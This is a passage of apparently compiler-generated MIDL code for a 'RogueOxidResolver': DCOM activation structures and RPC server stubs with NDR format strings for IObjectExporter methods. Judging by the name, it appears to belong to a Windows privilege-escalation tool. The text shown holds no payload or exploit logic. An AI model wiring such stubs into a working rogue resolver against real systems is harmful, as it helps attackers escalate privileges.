#endif /* __IRemUnknown2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_RogueOxidResolver_0000_0003 */
/* [local] */

#define MIN_ACTPROP_LIMIT ( 1 )

#define MAX_ACTPROP_LIMIT ( 10 )

typedef struct _customREMOTE_REQUEST_SCM_INFO
    {
    DWORD ClientImpLevel;
    /* [range] */ unsigned short cRequestedProtseqs;
    /* [size_is] */ unsigned short *pRequestedProtseqs;
    } customREMOTE_REQUEST_SCM_INFO;

typedef struct _customREMOTE_REPLY_SCM_INFO
    {
    OXID Oxid;
    DUALSTRINGARRAY *pdsaOxidBindings;
    IPID ipidRemUnknown;
    DWORD authnHint;
    COMVERSION serverVersion;
    } customREMOTE_REPLY_SCM_INFO;

typedef struct tagInstantiationInfoData
    {
    CLSID classId;
    DWORD classCtx;
    DWORD actvflags;
    long fIsSurrogate;
    /* [range] */ DWORD cIID;
    DWORD instFlag;
    /* [size_is] */ IID *pIID;
    DWORD thisSize;
    COMVERSION clientCOMVersion;
    } InstantiationInfoData;

typedef struct tagLocationInfoData
    {
    /* [string] */ wchar_t *machineName;
    DWORD processId;
    DWORD apartmentId;
    DWORD contextId;
    } LocationInfoData;

typedef struct tagActivationContextInfoData
    {
    long clientOK;
    long bReserved1;
    DWORD dwReserved1;
    DWORD dwReserved2;
    MInterfacePointer *pIFDClientCtx;
    MInterfacePointer *pIFDPrototypeCtx;
    } ActivationContextInfoData;

typedef struct tagCustomHeader
    {
    DWORD totalSize;
    DWORD headerSize;
    DWORD dwReserved;
    DWORD destCtx;
    /* [range] */ DWORD cIfs;
    CLSID classInfoClsid;
    /* [size_is] */ CLSID *pclsid;
    /* [size_is] */ DWORD *pSizes;
    DWORD *pdwReserved;
    } CustomHeader;

typedef struct tagPropsOutInfo
    {
    /* [range] */ DWORD cIfs;
    /* [size_is] */ IID *piid;
    /* [size_is] */ HRESULT *phresults;
    /* [size_is] */ MInterfacePointer **ppIntfData;
    } PropsOutInfo;

typedef struct tagSecurityInfoData
    {
    DWORD dwAuthnFlags;
    COSERVERINFO *pServerInfo;
    DWORD *pdwReserved;
    } SecurityInfoData;

typedef struct tagScmRequestInfoData
    {
    DWORD *pdwReserved;
    customREMOTE_REQUEST_SCM_INFO *remoteRequest;
    } ScmRequestInfoData;

typedef struct tagScmReplyInfoData
    {
    DWORD *pdwReserved;
    customREMOTE_REPLY_SCM_INFO *remoteReply;
    } ScmReplyInfoData;

typedef struct tagInstanceInfoData
    {
    /* [string] */ wchar_t *fileName;
    DWORD mode;
    MInterfacePointer *ifdROT;
    MInterfacePointer *ifdStg;
    } InstanceInfoData;

typedef /* [public] */
enum __MIDL___MIDL_itf_RogueOxidResolver_0000_0003_0001
    {
        SPD_FLAG_USE_CONSOLE_SESSION = 0x1,
        SPD_FLAG_USE_DEFAULT_AUTHN_LVL = 0x2
    } SPD_FLAGS;

typedef struct tagSpecialPropertiesData
    {
    unsigned long dwSessionId;
    long fRemoteThisSessionId;
    long fClientImpersonating;
    long fPartitionIDPresent;
    DWORD dwDefaultAuthnLvl;
    GUID guidPartition;
    DWORD dwPRTFlags;
    DWORD dwOrigClsctx;
    DWORD dwFlags;
    DWORD Reserved1;
    unsigned __int64 Reserved2;
    DWORD Reserved3[ 5 ];
    } SpecialPropertiesData;

typedef struct tagSpecialPropertiesData_Alternate
    {
    unsigned long dwSessionId;
    long fRemoteThisSessionId;
    long fClientImpersonating;
    long fPartitionIDPresent;
    DWORD dwDefaultAuthnLvl;
    GUID guidPartition;
    DWORD dwPRTFlags;
    DWORD dwOrigClsctx;
    DWORD dwFlags;
    DWORD Reserved3[ 8 ];
    } SpecialPropertiesData_Alternate;



extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0003_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0003_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif


--------------------------------------------------------------------------------
/RogueOxidResolver_s.c:
--------------------------------------------------------------------------------


/* this ALWAYS GENERATED file contains the RPC server stubs */


/* File created by MIDL compiler version 8.01.0622 */
/* at Tue Jan 19 04:14:07 2038
 */
/* Compiler settings for RogueOxidResolver.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */

#if defined(_M_AMD64)


#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/

#include <string.h>
#include "RogueOxidResolver_h.h"

#define TYPE_FORMAT_STRING_SIZE 123
#define PROC_FORMAT_STRING_SIZE 361
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0

typedef struct _RogueOxidResolver_MIDL_TYPE_FORMAT_STRING
    {
    short Pad;
    unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
    } RogueOxidResolver_MIDL_TYPE_FORMAT_STRING;

typedef struct _RogueOxidResolver_MIDL_PROC_FORMAT_STRING
    {
    short Pad;
    unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
    } RogueOxidResolver_MIDL_PROC_FORMAT_STRING;

typedef struct _RogueOxidResolver_MIDL_EXPR_FORMAT_STRING
    {
    long Pad;
    unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
    } RogueOxidResolver_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};

static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax =
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};


extern const RogueOxidResolver_MIDL_TYPE_FORMAT_STRING RogueOxidResolver__MIDL_TypeFormatString;
extern const RogueOxidResolver_MIDL_PROC_FORMAT_STRING RogueOxidResolver__MIDL_ProcFormatString;
extern const RogueOxidResolver_MIDL_EXPR_FORMAT_STRING RogueOxidResolver__MIDL_ExprFormatString;

/* Standard interface: __MIDL_itf_RogueOxidResolver_0000_0000, ver. 0.0,
   GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */


/* Standard interface: IObjectExporter, ver. 0.0,
   GUID={0x99fcfec4,0x5260,0x101b,{0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a}} */


extern const MIDL_SERVER_INFO IObjectExporter_ServerInfo;

extern const RPC_DISPATCH_TABLE IObjectExporter_v0_0_DispatchTable;

static const RPC_SERVER_INTERFACE IObjectExporter___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    {{0x99fcfec4,0x5260,0x101b,{0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a}},{0,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    (RPC_DISPATCH_TABLE*)&IObjectExporter_v0_0_DispatchTable,
    0,
    0,
    0,
    &IObjectExporter_ServerInfo,
    0x06000000
    };
RPC_IF_HANDLE IObjectExporter_v0_0_s_ifspec = (RPC_IF_HANDLE)& IObjectExporter___RpcServerInterface;

extern const MIDL_STUB_DESC IObjectExporter_StubDesc;


/* Standard interface: __MIDL_itf_RogueOxidResolver_0000_0001, ver. 0.0,
   GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */


/* Standard interface: __MIDL_itf_RogueOxidResolver_0000_0003, ver. 0.0,
   GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */


#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
108 | #endif 109 | 110 | static const RogueOxidResolver_MIDL_PROC_FORMAT_STRING RogueOxidResolver__MIDL_ProcFormatString = 111 | { 112 | 0, 113 | { 114 | 115 | /* Procedure ResolveOxid */ 116 | 117 | 0x0, /* 0 */ 118 | 0x48, /* Old Flags: */ 119 | /* 2 */ NdrFcLong( 0x1 ), /* 1 */ 120 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 121 | /* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 122 | /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 123 | 0x0, /* 0 */ 124 | /* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 125 | /* 14 */ NdrFcShort( 0x2a ), /* 42 */ 126 | /* 16 */ NdrFcShort( 0x68 ), /* 104 */ 127 | /* 18 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ 128 | 0x7, /* 7 */ 129 | /* 20 */ 0xa, /* 10 */ 130 | 0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */ 131 | /* 22 */ NdrFcShort( 0x1 ), /* 1 */ 132 | /* 24 */ NdrFcShort( 0x1 ), /* 1 */ 133 | /* 26 */ NdrFcShort( 0x0 ), /* 0 */ 134 | /* 28 */ NdrFcShort( 0x0 ), /* 0 */ 135 | 136 | /* Parameter pOxid */ 137 | 138 | /* 30 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ 139 | /* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 140 | /* 34 */ 0xb, /* FC_HYPER */ 141 | 0x0, /* 0 */ 142 | 143 | /* Parameter cRequestedProtseqs */ 144 | 145 | /* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 146 | /* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 147 | /* 40 */ 0x6, /* FC_SHORT */ 148 | 0x0, /* 0 */ 149 | 150 | /* Parameter arRequestedProtseqs */ 151 | 152 | /* 42 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 153 | /* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 154 | /* 46 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ 155 | 156 | /* Parameter ppdsaOxidBindings */ 157 | 158 | /* 48 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 159 | /* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 160 | /* 52 */ NdrFcShort( 0x12 ), /* Type Offset=18 */ 161 | 162 | /* 
Parameter pipidRemUnknown */ 163 | 164 | /* 54 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ 165 | /* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 166 | /* 58 */ NdrFcShort( 0x3a ), /* Type Offset=58 */ 167 | 168 | /* Parameter pAuthnHint */ 169 | 170 | /* 60 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 171 | /* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 172 | /* 64 */ 0x8, /* FC_LONG */ 173 | 0x0, /* 0 */ 174 | 175 | /* Return value */ 176 | 177 | /* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 178 | /* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 179 | /* 70 */ 0x10, /* FC_ERROR_STATUS_T */ 180 | 0x0, /* 0 */ 181 | 182 | /* Procedure SimplePing */ 183 | 184 | /* 72 */ 0x0, /* 0 */ 185 | 0x48, /* Old Flags: */ 186 | /* 74 */ NdrFcLong( 0x1 ), /* 1 */ 187 | /* 78 */ NdrFcShort( 0x1 ), /* 1 */ 188 | /* 80 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 189 | /* 82 */ 0x32, /* FC_BIND_PRIMITIVE */ 190 | 0x0, /* 0 */ 191 | /* 84 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 192 | /* 86 */ NdrFcShort( 0x24 ), /* 36 */ 193 | /* 88 */ NdrFcShort( 0x8 ), /* 8 */ 194 | /* 90 */ 0x44, /* Oi2 Flags: has return, has ext, */ 195 | 0x2, /* 2 */ 196 | /* 92 */ 0xa, /* 10 */ 197 | 0x1, /* Ext Flags: new corr desc, */ 198 | /* 94 */ NdrFcShort( 0x0 ), /* 0 */ 199 | /* 96 */ NdrFcShort( 0x0 ), /* 0 */ 200 | /* 98 */ NdrFcShort( 0x0 ), /* 0 */ 201 | /* 100 */ NdrFcShort( 0x0 ), /* 0 */ 202 | 203 | /* Parameter pSetId */ 204 | 205 | /* 102 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ 206 | /* 104 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 207 | /* 106 */ 0xb, /* FC_HYPER */ 208 | 0x0, /* 0 */ 209 | 210 | /* Return value */ 211 | 212 | /* 108 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 213 | /* 110 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 214 | /* 112 */ 0x10, /* 
FC_ERROR_STATUS_T */ 215 | 0x0, /* 0 */ 216 | 217 | /* Procedure ComplexPing */ 218 | 219 | /* 114 */ 0x0, /* 0 */ 220 | 0x48, /* Old Flags: */ 221 | /* 116 */ NdrFcLong( 0x1 ), /* 1 */ 222 | /* 120 */ NdrFcShort( 0x2 ), /* 2 */ 223 | /* 122 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ 224 | /* 124 */ 0x32, /* FC_BIND_PRIMITIVE */ 225 | 0x0, /* 0 */ 226 | /* 126 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 227 | /* 128 */ NdrFcShort( 0x36 ), /* 54 */ 228 | /* 130 */ NdrFcShort( 0x46 ), /* 70 */ 229 | /* 132 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 230 | 0x8, /* 8 */ 231 | /* 134 */ 0xa, /* 10 */ 232 | 0x5, /* Ext Flags: new corr desc, srv corr check, */ 233 | /* 136 */ NdrFcShort( 0x0 ), /* 0 */ 234 | /* 138 */ NdrFcShort( 0x1 ), /* 1 */ 235 | /* 140 */ NdrFcShort( 0x0 ), /* 0 */ 236 | /* 142 */ NdrFcShort( 0x0 ), /* 0 */ 237 | 238 | /* Parameter pSetId */ 239 | 240 | /* 144 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ 241 | /* 146 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 242 | /* 148 */ 0xb, /* FC_HYPER */ 243 | 0x0, /* 0 */ 244 | 245 | /* Parameter SequenceNum */ 246 | 247 | /* 150 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 248 | /* 152 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 249 | /* 154 */ 0x6, /* FC_SHORT */ 250 | 0x0, /* 0 */ 251 | 252 | /* Parameter cAddToSet */ 253 | 254 | /* 156 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 255 | /* 158 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 256 | /* 160 */ 0x6, /* FC_SHORT */ 257 | 0x0, /* 0 */ 258 | 259 | /* Parameter cDelFromSet */ 260 | 261 | /* 162 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 262 | /* 164 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 263 | /* 166 */ 0x6, /* FC_SHORT */ 264 | 0x0, /* 0 */ 265 | 266 | /* Parameter AddToSet */ 267 | 268 | /* 168 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 269 | /* 170 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 
40 */ 270 | /* 172 */ NdrFcShort( 0x4a ), /* Type Offset=74 */ 271 | 272 | /* Parameter DelFromSet */ 273 | 274 | /* 174 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 275 | /* 176 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 276 | /* 178 */ NdrFcShort( 0x5a ), /* Type Offset=90 */ 277 | 278 | /* Parameter pPingBackoffFactor */ 279 | 280 | /* 180 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 281 | /* 182 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 282 | /* 184 */ 0x6, /* FC_SHORT */ 283 | 0x0, /* 0 */ 284 | 285 | /* Return value */ 286 | 287 | /* 186 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 288 | /* 188 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 289 | /* 190 */ 0x10, /* FC_ERROR_STATUS_T */ 290 | 0x0, /* 0 */ 291 | 292 | /* Procedure ServerAlive */ 293 | 294 | /* 192 */ 0x0, /* 0 */ 295 | 0x48, /* Old Flags: */ 296 | /* 194 */ NdrFcLong( 0x1 ), /* 1 */ 297 | /* 198 */ NdrFcShort( 0x3 ), /* 3 */ 298 | /* 200 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 299 | /* 202 */ 0x32, /* FC_BIND_PRIMITIVE */ 300 | 0x0, /* 0 */ 301 | /* 204 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 302 | /* 206 */ NdrFcShort( 0x0 ), /* 0 */ 303 | /* 208 */ NdrFcShort( 0x8 ), /* 8 */ 304 | /* 210 */ 0x44, /* Oi2 Flags: has return, has ext, */ 305 | 0x1, /* 1 */ 306 | /* 212 */ 0xa, /* 10 */ 307 | 0x1, /* Ext Flags: new corr desc, */ 308 | /* 214 */ NdrFcShort( 0x0 ), /* 0 */ 309 | /* 216 */ NdrFcShort( 0x0 ), /* 0 */ 310 | /* 218 */ NdrFcShort( 0x0 ), /* 0 */ 311 | /* 220 */ NdrFcShort( 0x0 ), /* 0 */ 312 | 313 | /* Return value */ 314 | 315 | /* 222 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 316 | /* 224 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 317 | /* 226 */ 0x10, /* FC_ERROR_STATUS_T */ 318 | 0x0, /* 0 */ 319 | 320 | /* Procedure ResolveOxid2 */ 321 | 322 | /* 228 */ 0x0, /* 0 */ 323 | 0x48, /* Old Flags: */ 324 | /* 230 */ NdrFcLong( 
0x1 ), /* 1 */ 325 | /* 234 */ NdrFcShort( 0x4 ), /* 4 */ 326 | /* 236 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ 327 | /* 238 */ 0x32, /* FC_BIND_PRIMITIVE */ 328 | 0x0, /* 0 */ 329 | /* 240 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 330 | /* 242 */ NdrFcShort( 0x2a ), /* 42 */ 331 | /* 244 */ NdrFcShort( 0x90 ), /* 144 */ 332 | /* 246 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ 333 | 0x8, /* 8 */ 334 | /* 248 */ 0xa, /* 10 */ 335 | 0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */ 336 | /* 250 */ NdrFcShort( 0x1 ), /* 1 */ 337 | /* 252 */ NdrFcShort( 0x1 ), /* 1 */ 338 | /* 254 */ NdrFcShort( 0x0 ), /* 0 */ 339 | /* 256 */ NdrFcShort( 0x0 ), /* 0 */ 340 | 341 | /* Parameter pOxid */ 342 | 343 | /* 258 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ 344 | /* 260 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 345 | /* 262 */ 0xb, /* FC_HYPER */ 346 | 0x0, /* 0 */ 347 | 348 | /* Parameter cRequestedProtseqs */ 349 | 350 | /* 264 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 351 | /* 266 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 352 | /* 268 */ 0x6, /* FC_SHORT */ 353 | 0x0, /* 0 */ 354 | 355 | /* Parameter arRequestedProtseqs */ 356 | 357 | /* 270 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 358 | /* 272 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 359 | /* 274 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ 360 | 361 | /* Parameter ppdsaOxidBindings */ 362 | 363 | /* 276 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 364 | /* 278 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 365 | /* 280 */ NdrFcShort( 0x12 ), /* Type Offset=18 */ 366 | 367 | /* Parameter pipidRemUnknown */ 368 | 369 | /* 282 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ 370 | /* 284 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 371 | /* 286 */ NdrFcShort( 0x3a ), /* 
Type Offset=58 */ 372 | 373 | /* Parameter pAuthnHint */ 374 | 375 | /* 288 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 376 | /* 290 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 377 | /* 292 */ 0x8, /* FC_LONG */ 378 | 0x0, /* 0 */ 379 | 380 | /* Parameter pComVersion */ 381 | 382 | /* 294 */ NdrFcShort( 0x2112 ), /* Flags: must free, out, simple ref, srv alloc size=8 */ 383 | /* 296 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 384 | /* 298 */ NdrFcShort( 0x72 ), /* Type Offset=114 */ 385 | 386 | /* Return value */ 387 | 388 | /* 300 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 389 | /* 302 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 390 | /* 304 */ 0x10, /* FC_ERROR_STATUS_T */ 391 | 0x0, /* 0 */ 392 | 393 | /* Procedure ServerAlive2 */ 394 | 395 | /* 306 */ 0x0, /* 0 */ 396 | 0x48, /* Old Flags: */ 397 | /* 308 */ NdrFcLong( 0x1 ), /* 1 */ 398 | /* 312 */ NdrFcShort( 0x5 ), /* 5 */ 399 | /* 314 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 400 | /* 316 */ 0x32, /* FC_BIND_PRIMITIVE */ 401 | 0x0, /* 0 */ 402 | /* 318 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 403 | /* 320 */ NdrFcShort( 0x0 ), /* 0 */ 404 | /* 322 */ NdrFcShort( 0x4c ), /* 76 */ 405 | /* 324 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ 406 | 0x4, /* 4 */ 407 | /* 326 */ 0xa, /* 10 */ 408 | 0x3, /* Ext Flags: new corr desc, clt corr check, */ 409 | /* 328 */ NdrFcShort( 0x1 ), /* 1 */ 410 | /* 330 */ NdrFcShort( 0x0 ), /* 0 */ 411 | /* 332 */ NdrFcShort( 0x0 ), /* 0 */ 412 | /* 334 */ NdrFcShort( 0x0 ), /* 0 */ 413 | 414 | /* Parameter pComVersion */ 415 | 416 | /* 336 */ NdrFcShort( 0x2112 ), /* Flags: must free, out, simple ref, srv alloc size=8 */ 417 | /* 338 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 418 | /* 340 */ NdrFcShort( 0x72 ), /* Type Offset=114 */ 419 | 420 | /* Parameter ppdsaOrBindings */ 421 | 422 | /* 342 */ NdrFcShort( 0x2013 ), /* Flags: must 
size, must free, out, srv alloc size=8 */ 423 | /* 344 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 424 | /* 346 */ NdrFcShort( 0x12 ), /* Type Offset=18 */ 425 | 426 | /* Parameter pReserved */ 427 | 428 | /* 348 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 429 | /* 350 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 430 | /* 352 */ 0x8, /* FC_LONG */ 431 | 0x0, /* 0 */ 432 | 433 | /* Return value */ 434 | 435 | /* 354 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 436 | /* 356 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 437 | /* 358 */ 0x10, /* FC_ERROR_STATUS_T */ 438 | 0x0, /* 0 */ 439 | 440 | 0x0 441 | } 442 | }; 443 | 444 | static const RogueOxidResolver_MIDL_TYPE_FORMAT_STRING RogueOxidResolver__MIDL_TypeFormatString = 445 | { 446 | 0, 447 | { 448 | NdrFcShort( 0x0 ), /* 0 */ 449 | /* 2 */ 450 | 0x11, 0x8, /* FC_RP [simple_pointer] */ 451 | /* 4 */ 0xb, /* FC_HYPER */ 452 | 0x5c, /* FC_PAD */ 453 | /* 6 */ 454 | 0x1b, /* FC_CARRAY */ 455 | 0x1, /* 1 */ 456 | /* 8 */ NdrFcShort( 0x2 ), /* 2 */ 457 | /* 10 */ 0x27, /* Corr desc: parameter, FC_USHORT */ 458 | 0x0, /* */ 459 | /* 12 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 460 | /* 14 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 461 | /* 16 */ 0x6, /* FC_SHORT */ 462 | 0x5b, /* FC_END */ 463 | /* 18 */ 464 | 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ 465 | /* 20 */ NdrFcShort( 0x2 ), /* Offset= 2 (22) */ 466 | /* 22 */ 467 | 0x12, 0x0, /* FC_UP */ 468 | /* 24 */ NdrFcShort( 0xe ), /* Offset= 14 (38) */ 469 | /* 26 */ 470 | 0x1b, /* FC_CARRAY */ 471 | 0x1, /* 1 */ 472 | /* 28 */ NdrFcShort( 0x2 ), /* 2 */ 473 | /* 30 */ 0x7, /* Corr desc: FC_USHORT */ 474 | 0x0, /* */ 475 | /* 32 */ NdrFcShort( 0xfffc ), /* -4 */ 476 | /* 34 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 477 | /* 36 */ 0x6, /* FC_SHORT */ 478 | 0x5b, /* FC_END */ 479 | /* 38 */ 480 | 0x17, /* FC_CSTRUCT */ 481 | 0x1, /* 1 */ 482 | /* 
40 */ NdrFcShort( 0x4 ), /* 4 */ 483 | /* 42 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (26) */ 484 | /* 44 */ 0x6, /* FC_SHORT */ 485 | 0x6, /* FC_SHORT */ 486 | /* 46 */ 0x5c, /* FC_PAD */ 487 | 0x5b, /* FC_END */ 488 | /* 48 */ 489 | 0x11, 0x4, /* FC_RP [alloced_on_stack] */ 490 | /* 50 */ NdrFcShort( 0x8 ), /* Offset= 8 (58) */ 491 | /* 52 */ 492 | 0x1d, /* FC_SMFARRAY */ 493 | 0x0, /* 0 */ 494 | /* 54 */ NdrFcShort( 0x8 ), /* 8 */ 495 | /* 56 */ 0x1, /* FC_BYTE */ 496 | 0x5b, /* FC_END */ 497 | /* 58 */ 498 | 0x15, /* FC_STRUCT */ 499 | 0x3, /* 3 */ 500 | /* 60 */ NdrFcShort( 0x10 ), /* 16 */ 501 | /* 62 */ 0x8, /* FC_LONG */ 502 | 0x6, /* FC_SHORT */ 503 | /* 64 */ 0x6, /* FC_SHORT */ 504 | 0x4c, /* FC_EMBEDDED_COMPLEX */ 505 | /* 66 */ 0x0, /* 0 */ 506 | NdrFcShort( 0xfff1 ), /* Offset= -15 (52) */ 507 | 0x5b, /* FC_END */ 508 | /* 70 */ 509 | 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ 510 | /* 72 */ 0x8, /* FC_LONG */ 511 | 0x5c, /* FC_PAD */ 512 | /* 74 */ 513 | 0x12, /* FC_UP */ 514 | 0x0, /* 0 */ 515 | /* 76 */ NdrFcShort( 0x2 ), /* Offset= 2 (78) */ 516 | /* 78 */ 517 | 0x1b, /* FC_CARRAY */ 518 | 0x7, /* 7 */ 519 | /* 80 */ NdrFcShort( 0x8 ), /* 8 */ 520 | /* 82 */ 0x27, /* Corr desc: parameter, FC_USHORT */ 521 | 0x0, /* */ 522 | /* 84 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 523 | /* 86 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 524 | /* 88 */ 0xb, /* FC_HYPER */ 525 | 0x5b, /* FC_END */ 526 | /* 90 */ 527 | 0x12, /* FC_UP */ 528 | 0x0, /* 0 */ 529 | /* 92 */ NdrFcShort( 0x2 ), /* Offset= 2 (94) */ 530 | /* 94 */ 531 | 0x1b, /* FC_CARRAY */ 532 | 0x7, /* 7 */ 533 | /* 96 */ NdrFcShort( 0x8 ), /* 8 */ 534 | /* 98 */ 0x27, /* Corr desc: parameter, FC_USHORT */ 535 | 0x0, /* */ 536 | /* 100 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 537 | /* 102 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 538 | /* 104 */ 0xb, /* FC_HYPER */ 539 | 0x5b, /* FC_END */ 540 | /* 106 */ 541 | 0x11, 0xc, /* FC_RP 
